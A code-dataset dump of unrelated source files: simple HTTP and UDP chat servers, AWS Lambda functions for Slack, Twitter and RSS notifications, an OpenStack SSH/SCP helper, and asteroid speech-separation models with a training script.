async def main(host='localhost', port=5768):
async with websockets.serve(analysis, host, port):
await asyncio.Future()
if __name__ == '__main__':
asyncio.run(main())
``` |
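A minimal matching client, assuming the server above runs locally on its default port 5768:
```python
import asyncio
import websockets

async def consume(uri='ws://localhost:5768'):
    async with websockets.connect(uri) as ws:
        async for message in ws:   # one JSON payload every `interval` seconds
            print(message)

if __name__ == '__main__':
    asyncio.run(consume())
```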
{
"source": "53jk1/Network-communication",
"score": 3
} |
#### File: 53jk1/Network-communication/httpchat.py
```python
import json
import os
import socket
import sys
from threading import Event, Lock, Thread
DEBUG = False # Changing to True displays additional messages.
# Implementation of website logic.
class SimpleChatWWW():
def __init__(self, the_end):
self.the_end = the_end
self.files = "." # For example, the files may be in your working directory.
self.file_cache = {}
self.file_cache_lock = Lock()
self.messages = []
self.messages_offset = 0
self.messages_lock = Lock()
self.messages_limit = 1000 # Maximum number of stored messages.
# Mapping web addresses to handlers.
self.handlers = {
('GET', '/'): self.__handle_GET_index,
('GET', 'index.html'): self.__handle_GET_index,
('GET', '/style.css'): self.__handle_GET_style,
('GET', '/main.js'): self.__handle_GET_javascript,
('POST', '/chat'): self.__handle_POST_chat,
('POST', '/messages'): self.__handle_POST_messages,
}
def handle_http_request(self, req):
req_query = (req['method'], req['query'])
if req_query not in self.handlers:
return { 'status': (404, 'Not Found') }
return self.handlers[req_query](req)
def __handle_GET_index(self, req):
return self.__send_file('httpchat_index.html')
def __handle_GET_style(self, req):
return self.__send_file('httpchat_style.css')
def __handle_GET_javascript(self, req):
return self.__send_file('httpchat_main.js')
def __handle_POST_chat(self, req):
# Read the needed fields from the received JSON object.
# It is safe not to make any assumptions about the content and
# type of data being transferred.
try:
obj = json.loads(req['data'])
except ValueError:
return { 'status': (400, 'Bad Request') }
if type(obj) is not dict or 'text' not in obj:
return { 'status': (400, 'Bad Request') }
text = obj['text']
if type(text) is not str and type(text) is not unicode:
return { 'status': (400, 'Bad Request') }
sender_ip = req['client_ip']
# Add a message to the list.
# If the list is longer than the limit,
# remove one message in front and increase the offset.
with self.messages_lock:
if len(self.messages) > self.messages_limit:
self.messages.pop(0)
self.messages_offset += 1
self.messages.append((sender_ip, text))
sys.stdout.write("[ INFO ] <%s> %s\n" % (sender_ip, text))
return { 'status': (200, 'OK') }
def __handle_POST_messages(self, req):
# Read the needed fields from the received JSON object.
# It is safe not to make any assumptions about the content and type of data being transferred.
try:
obj = json.loads(req['data'])
except ValueError:
return { 'status': (400, 'Bad Request') }
if type(obj) is not dict or 'last_message_id' not in obj:
return { 'status': (400, 'Bad Request') }
last_message_id = obj['last_message_id']
if type(last_message_id) is not int:
return { 'status': (400, 'Bad Request') }
# Copy all messages, starting with last_message_id.
with self.messages_lock:
last_message_id -= self.messages_offset
if last_message_id < 0:
last_message_id = 0
messages = self.messages[last_message_id:]
new_last_message_id = self.messages_offset + len(self.messages)
# Generate a response.
data = json.dumps({
"last_message_id": new_last_message_id,
"messages": messages
})
return {
'status': (200, 'OK'),
'headers': [
('Content-Type', 'application/json;charset=utf-8'),
],
'data': data
}
# Creating a response containing the contents of the file on the disk.
# In practice, the method below additionally tries to cache files and read
# them only if they have not already been loaded or if the file has changed
# in the meantime.
def __send_file(self, fname):
# Determine the file type based on its extension.
ext = os.path.splitext(fname)[1]
mime_type = {
'.html': 'text/html;charset=utf-8',
'.js': 'application/javascript;charset=utf-8',
'.css': 'text/css;charset=utf-8',
}.get(ext.lower(), 'application/octet-stream')
# Check when the file was last modified.
try:
mtime = os.stat(fname).st_mtime
except:
# Unfortunately, CPython on Windows throws an exception class that is not declared under GNU/Linux.
# The easiest way is to catch all exceptions, although this is definitely an inelegant solution.
# The file probably does not exist or cannot be accessed.
return { 'status': (404, 'Not Found') }
# Check if the file is in the cache.
with self.file_cache_lock:
if fname in self.file_cache and self.file_cache[fname][0] == mtime:
return {
'status': (200, 'OK'),
'headers': [
('Content-Type', mime_type),
],
'data': self.file_cache[fname][1]
}
# As a last resort, load the file.
try:
with open(fname, 'rb') as f:
data = f.read()
                mtime = os.fstat(f.fileno()).st_mtime # Update the mtime.
except IOError as e:
# Failed to read the file.
if DEBUG:
sys.stdout.write("[WARNING] File %s not found, but requested.\n" % fname)
return { 'status': (404, 'Not Found') }
# Add the contents of the file to the cache (unless another thread has done so in the meantime).
with self.file_cache_lock:
if fname not in self.file_cache or self.file_cache[fname][0] < mtime:
self.file_cache[fname] = (mtime, data)
# Send a reply with the contents of the file.
return {
'status': (200, 'OK'),
'headers': [
('Content-Type', mime_type),
],
'data': data
}
# A very simple implementation of a multi-threaded HTTP server.
class ClientThread(Thread):
def __init__(self, website, sock, sock_addr):
super(ClientThread, self).__init__()
self.s = sock
self.s_addr = sock_addr
self.website = website
def __recv_http_request(self):
# Very simplified processing of an HTTP request with the main purpose of mining:
# - methods
# - desired path
# - next parameters in the form of a dictionary
# - additional data (in the case of POST)
# Receive data until completion of header.
data = recv_until(self.s, '\r\n\r\n')
if not data:
return None
# Split the query into lines.
lines = data.split('\r\n')
# Analyze the query (first line).
query_tokens = lines.pop(0).split(' ')
if len(query_tokens) != 3:
return None
method, query, version = query_tokens
# Load parameters.
headers = {}
for line in lines:
tokens = line.split(':', 1)
if len(tokens) != 2:
continue
# The capitalization of the header does not matter,
# so it is a good idea to normalize it,
# e.g. by converting all letters to lowercase.
header_name = tokens[0].strip().lower()
header_value = tokens[1].strip()
headers[header_name] = header_value
# For POST method, download additional data.
        # Note: this example implementation does not limit the amount of transferred data in any way.
if method == 'POST':
try:
data_length = int(headers['content-length'])
data = recv_all(self.s, data_length)
except KeyError as e:
# There is no Content-Length entry in the headers.
data = recv_remaining(self.s)
except ValueError as e:
return None
else:
data = None
# Put all relevant data in the dictionary and return it.
request = {
"method": method,
"query": query,
"headers": headers,
"data": data,
"client_ip": self.s_addr[0],
"client_port": self.s_addr[1]
}
return request
def __send_http_response(self, response):
# Construct the HTTP response.
lines = []
lines.append('HTTP/1.1 %u %s' % response['status'])
# Set the basic fields.
lines.append('Server: example')
if 'data' in response:
lines.append('Content-Length: %u' % len(response['data']))
else:
lines.append('Content-Length: 0')
# Rewrite the headlines.
if 'headers' in response:
for header in response['headers']:
lines.append('%s: %s' % header)
lines.append('')
# Rewrite the data.
if 'data' in response:
lines.append(response['data'])
# Convert the response to bytes and send.
if sys.version_info.major == 3:
converted_lines = []
for line in lines:
if type(line) is bytes:
converted_lines.append(line)
else:
converted_lines.append(bytes(line, 'utf-8'))
lines = converted_lines
self.s.sendall(b'\r\n'.join(lines))
def __handle_client(self):
request = self.__recv_http_request()
if not request:
if DEBUG:
sys.stdout.write("[WARNING] Client %s:%i doesn't make any sense. "
"Disconnecting.\n" % self.s_addr)
return
if DEBUG:
sys.stdout.write("[ INFO ] Client %s:%i requested %s\n" % (
self.s_addr[0], self.s_addr[1], request['query']))
response = self.website.handle_http_request(request)
self.__send_http_response(response)
def run(self):
self.s.settimeout(5) # Operations should not take longer than 5 seconds.
try:
self.__handle_client()
        except socket.timeout as e:
if DEBUG:
sys.stdout.write("[WARNING] Client %s:%i timed out. "
"Disconnecting.\n" % self.s_addr)
self.s.shutdown(socket.SHUT_RDWR)
self.s.close()
# Not a very quick but convenient function that receives data until a specific string (which is also returned) is encountered.
def recv_until(sock, txt):
txt = list(txt)
if sys.version_info.major == 3:
txt = [bytes(ch, 'ascii') for ch in txt]
full_data = []
last_n_bytes = [None] * len(txt)
# Until the last N bytes are equal to the searched value, read the data.
while last_n_bytes != txt:
next_byte = sock.recv(1)
if not next_byte:
return '' # The connection has been broken.
full_data.append(next_byte)
last_n_bytes.pop(0)
last_n_bytes.append(next_byte)
full_data = b''.join(full_data)
if sys.version_info.major == 3:
return str(full_data, 'utf-8')
return full_data
# Auxiliary function that receives an exact number of bytes.
def recv_all(sock, n):
data = []
while len(data) < n:
data_latest = sock.recv(n - len(data))
if not data_latest:
return None
data.append(data_latest)
data = b''.join(data)
if sys.version_info.major == 3:
return str(data, 'utf-8')
return data
# Auxiliary function that receives data from the socket until disconnected.
def recv_remaining(sock):
data = []
while True:
data_latest = sock.recv(4096)
if not data_latest:
data = b''.join(data)
if sys.version_info.major == 3:
return str(data, 'utf-8')
return data
data.append(data_latest)
def main():
the_end = Event()
website = SimpleChatWWW(the_end)
# Create a socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# In the case of GNU/Linux it should be pointed out that the same local
# address should be usable immediately after closing the socket.
# Otherwise, the address will be in a "quarantine" state (TIME_WAIT)
# for 60 seconds, and during this time attempting to bind the socket
# again will fail.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Listen on port 8888 on all interfaces.
s.bind(('0.0.0.0', 8888))
s.listen(32) # The number in the parameter indicates the maximum length
# of the queue of waiting connections. In this case, calls
# will be answered on a regular basis, so the queue may be small.
# Typical values are 128 (GNU / Linux) or "several hundred" (Windows).
# Set a timeout on the socket so that blocking operations on it will be interrupted
# every second. This allows the code to verify that the server has been called to exit.
s.settimeout(1)
while not the_end.is_set():
# Pick up the call.
try:
c, c_addr = s.accept()
c.setblocking(1) # In some Python implementations, the socket returned by the
# accept method on a listening socket with a timeout setting
# is asynchronous by default, which is undesirable behavior.
if DEBUG:
sys.stdout.write("[ INFO ] New connection: %s:%i\n" % c_addr)
except socket.timeout as e:
continue # Go back to the beginning of the loop and check the end condition.
# New connection.
# Create a new thread to handle it (alternatively, you could use threadpool here).
ct = ClientThread(website, c, c_addr)
ct.start()
if __name__ == "__main__":
main()
```
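A quick smoke test of the two POST endpoints, assuming the server above runs locally on port 8888:
```python
import requests

base = 'http://localhost:8888'
requests.post(base + '/chat', json={'text': 'hello from requests'})
r = requests.post(base + '/messages', json={'last_message_id': 0})
print(r.json())   # {'last_message_id': ..., 'messages': [[sender_ip, text], ...]}
```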
#### File: 53jk1/Network-communication/udp.py
```python
import hashlib
import json
import os
import socket
import sys
import time
from struct import pack, unpack
from threading import Event, Lock, Thread
# Default port - it can be changed by specifying a different one in the script argument.
CHAT_PORT = 59999
PY3 = False
if sys.version_info.major == 3:
PY3 = True
# Thread receiving messages.
class Receiver(Thread):
def __init__(self, s, the_end, p2pchat):
super(Receiver, self).__init__()
self.s = s
self.the_end = the_end
self.p2pchat = p2pchat
def run(self):
while not self.the_end.is_set():
try:
# Receive a packet with the maximum possible UDP/IPv4 packet size.
packet, addr = self.s.recvfrom(0xffff)
if PY3:
packet = str(packet, 'utf-8')
packet = json.loads(packet)
t = packet["type"]
except socket.timeout as e:
continue
except ValueError as e:
# The case where the data is not properly formatted JSON.
continue
except KeyError as e:
# Case where packet does not have "type" key defined.
continue
except TypeError as e:
# The case where packet is not a dictionary.
continue
addr = "%s:%u" % addr
self.p2pchat.handle_incoming(t, packet, addr)
self.s.close()
class P2PChat():
def __init__(self):
self.nickname = ''
self.s = None
self.the_end = Event()
self.nearby_users = set()
self.known_messages = set()
self.id_counter = 0
self.unique_tag = os.urandom(16)
def main(self):
print("Enter your nickname: ", end="", flush=True)
nickname = sys.stdin.readline()
if not nickname:
return
self.nickname = nickname.strip()
# Process starting IP of other users.
port = CHAT_PORT
if len(sys.argv) == 2:
port = int(sys.argv[1])
print("Creating UDP socket at port %u.\n"
"To change the port, restart the app like this: upchat.py <port>\n" % port)
# Create a UDP socket on the selected port and all interfaces.
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.settimeout(0.2)
self.s.bind(("0.0.0.0", port))
# Start a thread that receives data.
th = Receiver(self.s, self.the_end, self)
th.start()
print("To start please add another user's address, e.g.:\n"
" /add 1.2.3.4\n"
" /add 1.2.3.4:59999\n"
" /add kacper.bak.pl:45454\n"
"Or wait for a message form someone else.\n")
# Go to the main loop.
try:
while not self.the_end.is_set():
sys.stdout.write("? ")
sys.stdout.flush()
# Read line from user.
                ln = sys.stdin.readline()
if not ln:
self.the_end.set()
continue
ln = ln.strip()
if not ln:
continue
if ln[0] == '/':
# Order.
                    cmd = [c for c in ln.split(' ') if len(c) > 0]
self.handle_cmd(cmd[0], cmd[1:])
else:
# Message.
self.send_message(ln)
except KeyboardInterrupt as e:
self.the_end.set()
# The Receiver should close the socket when it exits.
print("Bye!")
def handle_incoming(self, t, packet, addr):
# Packet with information about new neighboring node in P2P network.
if t == "HELLO":
print("# %s/%s connected" % (addr, packet["name"]))
self.add_nearby_user(addr)
return
# Text message package.
if t == "MESSAGE":
# If the sender has been unknown so far, add it to the set of adjacent nodes.
self.add_nearby_user(addr)
# Check that we have not received this message from another node on the network.
if packet["id"] in self.known_messages:
return
self.known_messages.add(packet["id"])
# Add the sender of the message to the list of nodes the message has passed through.
packet["peers"].append(addr)
# View the message and its route.
print("\n[sent by: %s]" % ' --> '.join(packet["peers"]))
print("<%s> %s" % (packet["name"], packet["text"]))
# Send a message to adjacent nodes.
self.send_packet(packet, None, addr)
    def handle_cmd(self, cmd, args):
# For the /quit command, exit the program.
if cmd == "/quit":
self.the_end.set()
return
# If adding nodes manually, make sure they are spelled correctly,
# translate the domain (DNS) to IP address and add to the set of adjacent nodes.
if cmd == "/add":
for p in args:
port = CHAT_PORT
addr = p
try:
if ':' in p:
addr, port = p.split(':', 1)
port = int(port)
addr = socket.gethostbyname(addr)
except ValueError as e:
print("# address %s invalid (format)" % p)
continue
except socket.gaierror as e:
print("# host %s not found" % addr)
continue
addr = "%s:%u" % (addr, port)
self.add_nearby_user(addr)
return
# Unknown command.
print(" unknown command %s" % cmd)
def add_nearby_user(self, addr):
        # Skip nodes that are already known.
        if addr in self.nearby_users:
            return
        # Add the node and greet it with a HELLO packet.
self.nearby_users.add(addr)
self.send_packet({
"type": "HELLO",
"name": self.nickname
}, addr)
def send_message(self, msg):
# Enumerate a unique message ID.
hbase = "%s\0%s\0%u\0" % (self.nickname, msg, self.id_counter)
self.id_counter += 1
if PY3:
hbase = bytes(hbase, 'utf-8')
h = hashlib.md5(hbase + self.unique_tag).hexdigest()
# Send the message packet to all known nodes.
self.send_packet({
"type" : "MESSAGE",
"name" : self.nickname,
"text" : msg,
"id" : h,
"peers": []
})
def send_packet(self, packet, target = None, excluded=set()):
# Serialize the package.
packet = json.dumps(packet)
if PY3:
packet = bytes(packet, 'utf-8')
# If no target node is specified, send the message to all nodes except those in the excluded set.
if not target:
target = list(self.nearby_users)
else:
target = [target]
for t in target:
if t in excluded:
continue
# I assume all addresses are correctly formatted at this point.
addr, port = t.split(":")
port = int(port)
# The actual shipment of the package.
self.s.sendto(packet, (addr, port))
def main():
p2p = P2PChat()
p2p.main()
if __name__ == "__main__":
main()
``` |
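For reference, the two JSON wire formats exchanged by `P2PChat` above (values are illustrative):
```python
import json

hello = {"type": "HELLO", "name": "alice"}
message = {
    "type": "MESSAGE",
    "name": "alice",
    "text": "hi all",
    "id": "md5-hex-digest",   # hash of nickname, text, counter and a random tag
    "peers": [],              # appended to by every relaying node
}
print(json.dumps(hello), json.dumps(message))
```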
{
"source": "53ningen/GetMetricWidgetImage",
"score": 2
} |
#### File: src/notify_slack/app.py
```python
import os
import json
from slackclient import SlackClient
import log
logger = log.get_logger('INFO')
verification_token = os.environ['SlackVerificationToken']
slack = SlackClient(verification_token)
def upload_file(event):
logger.info(json.dumps({
'action': 'upload_file',
'args': event
}))
if not event.get('image'): return None
res = slack.api_call(
'files.upload',
title = event.get('title'),
initial_comment = event.get('initial_comment'),
content = event.get('content'),
channels = [event.get('channel')],
file = bytes.fromhex(event.get('image')),
)
logger.info(json.dumps(res))
return res
def handle(event):
upload_file(event)
def lambda_handler(event, context):
records = event.get('Records')
for record in records:
item = json.loads(record['Sns']['Message'])
handle(item)
``` |
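A hypothetical SNS message body consumed by `lambda_handler` above; the `image` field is a hex string decoded with `bytes.fromhex` before `files.upload`:
```python
import json

event = {
    'title': 'CPU utilization',
    'initial_comment': 'Daily metric snapshot',
    'content': None,
    'channel': '#monitoring',
    'image': '89504e47',   # hex-encoded PNG bytes (here just the PNG magic)
}
print(json.dumps(event))
```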
{
"source": "53ningen/kusablade",
"score": 2
} |
#### File: src/get_kusablade/app.py
```python
import json
import requests
from TwitterAPI import TwitterAPI
from logging import getLogger, StreamHandler, DEBUG
import boto3
import os
favorite_topic_arn = os.environ['FavoriteTopicArn']
consumer_key = os.environ['TwitterConsumerKey']
consumer_secret= os.environ['TwitterConsumerSecret']
access_token_key = os.environ['TwitterAccessTokenKey']
access_token_secret = os.environ['TwitterAccessTokenSecret']
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(DEBUG)
logger.setLevel(DEBUG)
logger.addHandler(handler)
logger.propagate = False
twitter = TwitterAPI(consumer_key, consumer_secret, access_token_key, access_token_secret)
sns = boto3.client('sns')
def lambda_handler(event, context):
try:
items = twitter.request('search/tweets', {
'q': '草ブレード OR "草ブレ" OR 草ブレーダー',
'count': 100,
'tweet_mode': 'extended',
'result_type': 'recent',
})
except requests.RequestException as e:
        logger.error(e)
        return
ids = []
for item in items:
ids.append(item['id_str'])
try:
items = twitter.request('statuses/lookup', {
'id': ','.join(ids)
})
except requests.RequestException as e:
        logger.error(e)
        return
sum = 0
queued = 0
for item in items:
sum += 1
if not item['favorited'] and item['in_reply_to_status_id'] is None:
j = json.dumps(item, ensure_ascii=False)
logger.debug(j)
res = sns.publish(
TopicArn=favorite_topic_arn,
Message=j,
)
logger.info(res)
queued += 1
res = {
'sum': sum,
'queued_count': queued,
}
logger.info(json.dumps(res))
return res
``` |
{
"source": "53ningen/MonitorWebsiteChanges",
"score": 2
} |
#### File: src/collect_rss_entries/app.py
```python
import os
import json
import boto3
import string
import feedparser
from rss import RSSConfig, RSSConfigItem
import log
import cache
import config
import sns
logger = None
config_key_name = os.environ['ConfigKeyName']
monita_bucket = os.environ['MonitaBucket']
topic = os.environ['TopicArn']
in_memory_cache = cache.InMemoryCache()
session = boto3.session.Session()
if os.environ['Stage'] == 'local':
sns_cli = session.client('sns', endpoint_url='http://localstack:4575')
s3_cache = cache.S3Cache(session.resource('s3', endpoint_url='http://localstack:4572').Bucket(monita_bucket), 'data/rss/', True)
config_bucket = boto3.resource('s3', endpoint_url='http://localstack:4572').Bucket(os.environ['ConfigBucket'])
else:
sns_cli = session.client('sns')
s3_cache = cache.S3Cache(session.resource('s3').Bucket(monita_bucket), 'data/rss/', True)
config_bucket = boto3.resource('s3').Bucket(os.environ['ConfigBucket'])
def create_message(fmt: str, entry) -> str:
if fmt is None:
return entry
else:
template = string.Template(fmt)
return template.substitute(dict(entry))
def handle_entries(entries, rss_config_item: RSSConfigItem, topic: str, fmt: str) -> int:
new_entry = 0
for entry in entries:
try:
id = rss_config_item.generate_id(entry.id)
if in_memory_cache.get(id):
continue
if s3_cache.get(id):
in_memory_cache.put(id, entry)
continue
message = create_message(fmt, entry)
sns.notify(sns_cli, json.dumps(message, ensure_ascii=False), topic, logger)
in_memory_cache.put(id, entry)
s3_cache.put_dict(id, entry)
new_entry += 1
except Exception as e:
logger.error(e)
continue
return new_entry
def lambda_handler(event, context):
dic = config.load_config_file(config_bucket, config_key_name)
rss_config = RSSConfig.of(dic['functions']['collect_rss_entries'])
global logger
logger = log.get_logger(dic['globals']['log_level'])
new_entry = 0
for rss_config_item in rss_config.get_items():
try:
res = feedparser.parse(rss_config_item.get_url())
new_entry += handle_entries(res.entries, rss_config_item, topic, rss_config.get_format())
except Exception as e:
logger.error(e)
continue
return {
'new_entry': new_entry
}
```
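For reference, `create_message` relies on `string.Template`, so the configured format uses `${field}` placeholders resolved against the feed entry. A small illustration (the template and entry values here are assumed examples, not taken from any real config):
```python
import string

fmt = "New post: ${title} (${link})"
entry = {"title": "Release 1.2", "link": "https://example.com/1.2"}
print(string.Template(fmt).substitute(entry))
# -> New post: Release 1.2 (https://example.com/1.2)
```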
#### File: shared/python/sns.py
```python
def notify(sns_cli, message: str, topic: str, logger):
logger.debug(message)
res = sns_cli.publish(
TopicArn=topic,
Message=message,
)
logger.info(res)
return res
``` |
{
"source": "53rg3/osssh",
"score": 3
} |
#### File: osssh/models/SshData.py
```python
from dataclasses import dataclass
from models.OsProject import OsProject
@dataclass
class SshData:
hostName: str
projectName: str
targetIp: str
targetUser: str
pathToSshKey: str
userAtJumpHost: str
def __init__(self, targetIp: str, hostName: str, osProject: OsProject):
self.hostName = hostName
self.projectName = osProject.id
self.targetIp = targetIp
self.targetUser = osProject.targetUser
self.pathToSshKey = osProject.pathToSshKey
self.userAtJumpHost = osProject.userAtJumpHost
```
#### File: 53rg3/osssh/osssh.py
```python
import click
from models import Mode
from prompts.CachePrompt import updateCachePrompt
from prompts.InstanceSelection import instanceSelectionPrompt
from prompts.ModeSelection import selectModePrompt
from prompts.ScpPrompt import uploadPrompt, downloadPrompt
from utils import InstanceIndex, Utils, Action
@click.command()
@click.option("-u", "--update", is_flag=True,
help="Shows prompt to update the cache, sourced from `openstack server list`")
@click.option("-l", "--list", is_flag=True,
help="Prints list of all service in the cache")
@click.option("-e", "--export", required=False,
help="Prints the ENVs of the desired OpenStack project")
@click.option("-t", "--override-title", is_flag=True,
help="Will override the terminal title with OpenStack data, might cause problems selecting text. Therefore only as opt-in.")
def main(update, list, export, override_title):
"""
SSH helper for managing multiple OpenStack projects. Run without any arguments to get fancy prompts.
"""
if update:
updateCachePrompt(InstanceIndex.loadOsProjectsListOnly())
if list:
InstanceIndex.printList()
exit(0)
if export:
InstanceIndex.printEnvs(export)
exit(0)
# Prepare
instanceIndex = InstanceIndex.create()
sshData = instanceSelectionPrompt(instanceIndex)
mode = selectModePrompt()
# Execute
if mode == Mode.ssh:
Action.ssh(sshData, override_title)
elif mode == Mode.download:
downloadPrompt(sshData)
elif mode == Mode.upload:
uploadPrompt(sshData)
else:
Utils.exitWithError(f"Mode not recognized, got '{mode}'")
if __name__ == '__main__':
main()
```
#### File: osssh/prompts/ModeSelection.py
```python
import click
from prompt_toolkit import prompt
from models import Mode
from utils import Utils
def selectModePrompt() -> str:
Utils.printInfo("> What do you want to do?")
selection = "[1] SSH (default) [2] Download [3] Upload"
choiceMap = {
"1": Mode.ssh,
"2": Mode.download,
"3": Mode.upload
}
click.secho(selection)
choice = prompt('Choice: ')
if choice == '':
choice = "1"
if choice not in choiceMap:
Utils.exitWithError(f"Choice not recognized. Got '{choice}', need one of {list(choiceMap.keys())}")
return choiceMap[choice]
```
#### File: osssh/prompts/ScpPrompt.py
```python
import os.path
from prompt_toolkit import prompt
from models import Constants
from models.SshData import SshData
from utils import Utils, Action
def uploadPrompt(sshData: SshData):
source = prompt(
message=[("class:yellow", "> Path to upload (file or folder): ")],
style=Constants.promptStyle
)
if not os.path.exists(source):
Utils.exitWithError(f"Provided path doesn't exist, check '{source}'")
target = prompt(
message=[("class:yellow", "> Path on remote ( ~/ is allowed): ")],
style=Constants.promptStyle
)
target = f"{sshData.targetUser}@{sshData.targetIp}:{target}"
Action.scp(source, target, sshData)
def downloadPrompt(sshData: SshData):
source = prompt(
message=[("class:yellow", "> Path to download (file or folder): ")],
style=Constants.promptStyle
)
source = f"{sshData.targetUser}@{sshData.targetIp}:{source}"
target = prompt(
message=[("class:yellow", "> Path on localhost (file or folder): ")],
style=Constants.promptStyle
)
if os.path.exists(target) and not os.path.isdir(target):
Utils.exitWithError(f"Provided path already exists and is not a directory, check '{target}'")
Action.scp(source, target, sshData)
``` |
{
"source": "53X/asteroid",
"score": 2
} |
#### File: asteroid/models/dccrnet.py
```python
from ..masknn.recurrent import DCCRMaskNet
from .dcunet import BaseDCUNet
class DCCRNet(BaseDCUNet):
"""DCCRNet as proposed in [1].
Args:
architecture (str): The architecture to use, must be "DCCRN-CL".
stft_kernel_size (int): STFT frame length to use
stft_stride (int, optional): STFT hop length to use.
References:
[1] : "DCCRN: Deep Complex Convolution Recurrent Network for Phase-Aware Speech Enhancement",
<NAME> et al.
https://arxiv.org/abs/2008.00264
"""
masknet_class = DCCRMaskNet
def __init__(self, *args, stft_kernel_size=512, masknet_kwargs=None, **kwargs):
super().__init__(
*args,
stft_kernel_size=stft_kernel_size,
masknet_kwargs={"n_freqs": stft_kernel_size // 2 + 1, **(masknet_kwargs or {})},
**kwargs,
)
```
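A minimal usage sketch for the class above; the waveform shape and forward call are assumptions based on `BaseDCUNet`'s encoder-masker-decoder interface, which is not shown here:
```python
import torch

# "DCCRN-CL" is the architecture named in the docstring; other kwargs assumed default.
model = DCCRNet(architecture="DCCRN-CL")
wav = torch.randn(1, 16000)  # one second of 16 kHz mono audio (illustrative)
enhanced = model(wav)        # denoised waveform, same batch layout as the input
```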
#### File: asteroid/models/lstm_tasnet.py
```python
import torch
from torch import nn
from copy import deepcopy
from ..filterbanks import make_enc_dec
from ..masknn import LSTMMasker
from .base_models import BaseEncoderMaskerDecoder
class LSTMTasNet(BaseEncoderMaskerDecoder):
"""TasNet separation model, as described in [1].
Args:
n_src (int): Number of masks to estimate.
out_chan (int or None): Number of bins in the estimated masks.
Defaults to `in_chan`.
hid_size (int): Number of neurons in the RNNs cell state.
Defaults to 128.
mask_act (str, optional): Which non-linear function to generate mask.
bidirectional (bool, optional): True for bidirectional Inter-Chunk RNN
(Intra-Chunk is always bidirectional).
rnn_type (str, optional): Type of RNN used. Choose between ``'RNN'``,
``'LSTM'`` and ``'GRU'``.
n_layers (int, optional): Number of layers in each RNN.
dropout (float, optional): Dropout ratio, must be in [0,1].
in_chan (int, optional): Number of input channels, should be equal to
n_filters.
fb_name (str, className): Filterbank family from which to make encoder
and decoder. To choose among [``'free'``, ``'analytic_free'``,
``'param_sinc'``, ``'stft'``].
n_filters (int): Number of filters / Input dimension of the masker net.
kernel_size (int): Length of the filters.
stride (int, optional): Stride of the convolution.
If None (default), set to ``kernel_size // 2``.
        **fb_kwargs (dict): Additional kwargs to pass to the filterbank
creation.
References:
[1]: Yi Luo et al. "Real-time Single-channel Dereverberation and Separation
with Time-domain Audio Separation Network", Interspeech 2018
"""
def __init__(
self,
n_src,
out_chan=None,
rnn_type="lstm",
n_layers=4,
hid_size=512,
dropout=0.3,
mask_act="sigmoid",
bidirectional=True,
in_chan=None,
fb_name="free",
n_filters=64,
kernel_size=16,
stride=8,
encoder_activation=None,
**fb_kwargs,
):
encoder, decoder = make_enc_dec(
fb_name, kernel_size=kernel_size, n_filters=n_filters, stride=stride, **fb_kwargs
)
n_feats = encoder.n_feats_out
if in_chan is not None:
assert in_chan == n_feats, (
"Number of filterbank output channels"
" and number of input channels should "
"be the same. Received "
f"{n_feats} and {in_chan}"
)
# Real gated encoder
encoder = _GatedEncoder(encoder)
# Masker
masker = LSTMMasker(
n_feats,
n_src,
out_chan=out_chan,
hid_size=hid_size,
mask_act=mask_act,
bidirectional=bidirectional,
rnn_type=rnn_type,
n_layers=n_layers,
dropout=dropout,
)
super().__init__(encoder, masker, decoder, encoder_activation=encoder_activation)
class _GatedEncoder(nn.Module):
def __init__(self, encoder):
super().__init__()
# For config
self.filterbank = encoder.filterbank
# Gated encoder.
self.encoder_relu = encoder
self.encoder_sig = deepcopy(encoder)
def forward(self, x):
relu_out = torch.relu(self.encoder_relu(x))
sig_out = torch.sigmoid(self.encoder_sig(x))
return sig_out * relu_out
```
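A short usage sketch for `LSTMTasNet` (the two-speaker setup and input length are illustrative; the output layout follows the usual `BaseEncoderMaskerDecoder` convention):
```python
import torch

model = LSTMTasNet(n_src=2)   # estimate two masks, one per speaker
mix = torch.randn(1, 8000)    # a short mono mixture (assumed length)
est_sources = model(mix)      # expected shape: (batch, n_src, time)
```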
#### File: wsj0-mix/DeepClustering/train.py
```python
import os
import argparse
import json
import yaml
import torch
from torch import nn
from torch.optim.lr_scheduler import ReduceLROnPlateau
import pytorch_lightning as pl
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from asteroid.engine.system import System
from asteroid.losses import PITLossWrapper, pairwise_mse
from asteroid.losses import deep_clustering_loss
from asteroid.filterbanks.transforms import take_mag, ebased_vad
from asteroid.data.wsj0_mix import make_dataloaders
from model import make_model_and_optimizer
EPS = 1e-8
parser = argparse.ArgumentParser()
parser.add_argument("--exp_dir", default="exp/tmp", help="Full path to save best validation model")
def main(conf):
exp_dir = conf["main_args"]["exp_dir"]
# Define Dataloader
train_loader, val_loader = make_dataloaders(**conf["data"], **conf["training"])
conf["masknet"].update({"n_src": conf["data"]["n_src"]})
# Define model, optimizer + scheduler
model, optimizer = make_model_and_optimizer(conf)
scheduler = None
if conf["training"]["half_lr"]:
scheduler = ReduceLROnPlateau(optimizer=optimizer, factor=0.5, patience=5)
# Save config
os.makedirs(exp_dir, exist_ok=True)
conf_path = os.path.join(exp_dir, "conf.yml")
with open(conf_path, "w") as outfile:
yaml.safe_dump(conf, outfile)
# Define loss function
loss_func = ChimeraLoss(alpha=conf["training"]["loss_alpha"])
# Put together in System
system = ChimeraSystem(
model=model,
loss_func=loss_func,
optimizer=optimizer,
train_loader=train_loader,
val_loader=val_loader,
scheduler=scheduler,
config=conf,
)
# Callbacks
checkpoint_dir = os.path.join(exp_dir, "checkpoints/")
checkpoint = ModelCheckpoint(
checkpoint_dir, monitor="val_loss", mode="min", save_top_k=5, verbose=True
)
early_stopping = False
if conf["training"]["early_stop"]:
early_stopping = EarlyStopping(monitor="val_loss", patience=30, verbose=True)
gpus = -1
# Don't ask GPU if they are not available.
if not torch.cuda.is_available():
print("No available GPU were found, set gpus to None")
gpus = None
# Train model
trainer = pl.Trainer(
max_epochs=conf["training"]["epochs"],
checkpoint_callback=checkpoint,
early_stop_callback=early_stopping,
default_root_dir=exp_dir,
gpus=gpus,
distributed_backend="dp",
train_percent_check=1.0, # Useful for fast experiment
gradient_clip_val=200,
)
trainer.fit(system)
best_k = {k: v.item() for k, v in checkpoint.best_k_models.items()}
with open(os.path.join(exp_dir, "best_k_models.json"), "w") as f:
json.dump(best_k, f, indent=0)
# Save last model for convenience
